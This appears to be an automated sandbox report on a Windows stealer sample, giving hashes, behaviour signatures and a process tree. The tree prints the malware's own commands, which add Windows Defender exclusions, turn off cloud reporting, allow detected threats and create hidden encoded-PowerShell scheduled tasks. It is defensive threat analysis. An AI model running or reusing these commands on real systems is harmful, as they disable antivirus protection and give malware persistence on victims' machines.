Overview

overview

10

Static

static

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    92s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/09/2022, 10:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    b80b22d11193ab71cb8cdbfeb37da16f

  • SHA1

    b3335d1375a575e09a12dd8fdcd6d82595b021fe

  • SHA256

    3413d80c4cfdf5760bbacf307959ef194e4b9596a66d4078fb57d5a12ab10b7e

  • SHA512

    c64ed279aa67f0851d768081f0cb2e52a09a82742f5c6932dd3762fd504afa0e82f63f0690d80ac8064009536da093e28d48ca7a04315a16db2e4dd82c799b37

  • SSDEEP

    196608:91O6FYGFwHcq9FgHUkGW3+J0Wh9sNm7aIKw25S3YN/CPfxcN:3O6OlcqwjN3g0WheNKhKxc3e/Ww

Score
8/10
discoveryspywarestealer

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Users\Admin\AppData\Local\Temp\7zS698C.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3436
      • C:\Users\Admin\AppData\Local\Temp\7zS6C7A.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1448
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:4308
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:1304
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1828
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2944
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4020
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4936
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gsSfDYQtI" /SC once /ST 08:21:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4416
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gsSfDYQtI"
                  4⤵
                    PID:1816
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gsSfDYQtI"
                    4⤵
                      PID:4688
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "byLWBUphYKVPGqoaZN" /SC once /ST 12:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\wBNJbuc.exe\" rw /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:4320
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:216
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:1156
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:4968
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:1880
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:4288
                      • C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\wBNJbuc.exe
                        C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\wBNJbuc.exe rw /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:3712
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3948
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3784
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:3996
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:3896
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:3964
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4052
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:4232
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:1892
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2928
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:4376
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1736
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:2612
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:1068
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4884
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:944
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:2376
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:748
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1572
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:3288
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:1448
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:4144
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:2664
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:3568
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:2200
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:2632
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4808
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BrFEHzbpwZEBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BrFEHzbpwZEBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZFNizbZnU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZFNizbZnU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIaOnhtotwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIaOnhtotwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gCafjQbERGAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gCafjQbERGAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\euGiausHkJdtKpVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\euGiausHkJdtKpVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\oCRUNVefZTIhACRx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\oCRUNVefZTIhACRx\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:448
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:4416
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:212
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1556
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:220
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:2016
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:2740
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:3984
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2260
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:2152
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4340
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4868
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\euGiausHkJdtKpVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:4780
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\euGiausHkJdtKpVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4288
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:1976
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:4940
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\oCRUNVefZTIhACRx /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5036
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\oCRUNVefZTIhACRx /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5056
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
